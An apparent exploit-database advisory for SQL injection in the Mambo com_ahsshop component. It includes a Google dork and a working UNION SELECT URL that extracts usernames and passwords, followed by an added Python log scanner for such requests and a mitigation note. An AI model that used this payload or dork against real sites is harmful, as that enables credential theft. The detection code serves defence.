The Mambo AHS Shop component suffers from a remote SQL injection vulnerability.
ef6cc291b84f91bfbb63b85556b4d62603fb1b707ea58b563bdc2a99cc20592f
------------------------------------------------------------------------------------------------------
# Exploit Title: Mambo Component com_ahsshop SQL Injection Vulnerability
# Google Dork: inurl:index.php?option=com_ahsshop
# Date: 01/09/2011
# Author: CoBRa_21 (Penetration Tester)
# E-Mail: ghost1lover@hotmail.com
# Software Link: https://www.netvistun.is/
# Tested on: FreeBSD 6.1 (remote host)
------------------------------------------------------------------------------------------------------
Exploit
https://localhost/[PATH]/index.php?option=com_ahsshop&flokkur=-294 union select 0,username,password,3,4,5,6,7,8,9 from mos_users
------------------------------------------------------------------------------------------------------
Thanks E-Banka.Org & Cyber-Warrior.Org
------------------------------------------------------------------------------------------------------
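Detection example (added here, not part of the original advisory and not the component's own code): a scan of web access logs for requests to com_ahsshop whose flokkur parameter is not a plain integer, which is what the request shown above looks like in a log. The log lines are constructed samples, and the rule that legitimate category ids are non-negative integers is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Sep/2011:10:00:01 +0000] "GET /index.php?option=com_ahsshop&flokkur=12 HTTP/1.1" 200 5120
198.51.100.9 - - [01/Sep/2011:10:00:05 +0000] "GET /index.php?option=com_ahsshop&flokkur=-294%20union%20select%200,username,password,3,4,5,6,7,8,9%20from%20mos_users HTTP/1.1" 200 7340
198.51.100.9 - - [01/Sep/2011:10:00:09 +0000] "GET /shop/index.php?flokkur=7+UNION+SELECT+1&option=com_ahsshop HTTP/1.1" 200 810
203.0.113.4 - - [01/Sep/2011:10:01:00 +0000] "GET /index.php?option=com_content&flokkur=abc HTTP/1.1" 200 900
203.0.113.5 - - [01/Sep/2011:10:02:00 +0000] "GET /index.php?option=com_ahsshop HTTP/1.1" 200 4000
"""

# Client address and request target from a combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Assumption: a legitimate category id is a short non-negative integer.
VALID_ID_RE = re.compile(r"\d{1,10}")


def suspicious_flokkur(line):
    """Return (client, decoded_value) if the line is a com_ahsshop request
    whose flokkur value is not a plain integer, otherwise None."""
    match = REQUEST_RE.match(line)
    if not match:
        return None
    client, target = match.groups()
    # parse_qs URL-decodes values, so %20 and + both become spaces.
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if "com_ahsshop" not in query.get("option", []):
        return None
    for value in query.get("flokkur", []):
        if not VALID_ID_RE.fullmatch(value):
            return client, value
    return None


def scan(log_text):
    """Collect every suspicious (client, value) pair in a block of log text."""
    hits = (suspicious_flokkur(line) for line in log_text.splitlines())
    return [hit for hit in hits if hit is not None]


if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"{client}\tflokkur={value!r}")
```

The same integer-only rule is the server-side mitigation: validate or cast flokkur to an integer and bind it as a query parameter before it reaches the database.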